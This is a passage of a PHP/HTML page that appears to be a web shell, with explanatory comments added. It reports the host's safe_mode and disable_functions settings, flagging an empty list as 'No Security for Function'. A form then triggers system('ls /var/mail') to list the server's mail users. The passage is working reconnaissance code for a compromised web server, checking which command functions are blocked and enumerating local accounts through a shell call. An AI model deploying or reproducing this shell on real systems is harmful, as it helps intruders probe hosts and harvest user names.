  614. if($safe_mode=='1') // prints ON only when the setting equals '1', OFF for every other value
  615. {
  616. echo 'ON';
  617. }else{
  618. echo 'OFF';
  619. }
  620.  
  621. ?>
  622. </strong>
  623. </td>
  624. </tr>
  625. <tr>
  626. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td>
  627. <td valign="top" bgcolor="#151515" colspan="5">
  628. <strong>
  629. <?php
  630. if(''==($func=@ini_get('disable_functions'))) // reads the host's disable_functions list; empty means nothing is disabled
  631. {
  632. echo "<font color=#00800F>No Security for Function</font></b>";
  633. }else{ // a non-empty list is printed as-is; system, passthru, exec and shell_exec would appear here if the host disabled them
  634. echo "<font color=red>$func</font></b>";
  635. }
  636. ?></strong></td>
  637. <tr>
  638. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  639. <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td>
  640. </table>
  641. </td>
  642. </tr>
  643. </table>
  644.  
  645.  
  646.  
  647.  
  648. <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
  649.  
  650.  
  651.  
  652.  
  653.  
  654. <form style="border: 0px ridge #FFFFFF">
  655.  
  656.  
  657.  
  658.  
  659. <p align="center"></td>
  660. </tr><div align="center">
  661.  
  662. <tr>
  663.  
  664.  
  665.  
  666. <input type="submit" name="user" value="user"><option value="name"></select>
  667. </form>
  668.  
  669.  
  670. <div align="center">
  671. <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5">
  672. <tr>
  673. <td bordercolorlight="#008000" bordercolordark="#006A00">
  674. <p align="left">
  675. <textarea method='POST' rows="25" name="S1" cols="16">
  676.  
  677.  
  678. <?php
  679.  
  680.  
  681.  
  682. if ($_GET['user'] ) // the brace-less if guards only the system() call below
  683.  
  684.  
  685. system('ls /var/mail'); // when a truthy "user" query parameter is present, lists /var/mail; the output lands in the surrounding textarea
  686.  
  687.  
  688.  
  689.  
  690.  
  691. for($uid=0;$uid<90000;$uid++){ // empty loop body: counts to 90000 and does nothing else
  692.  
  693. }
  694.  
  695.  
  696.  
  697.  
  698. ?></textarea>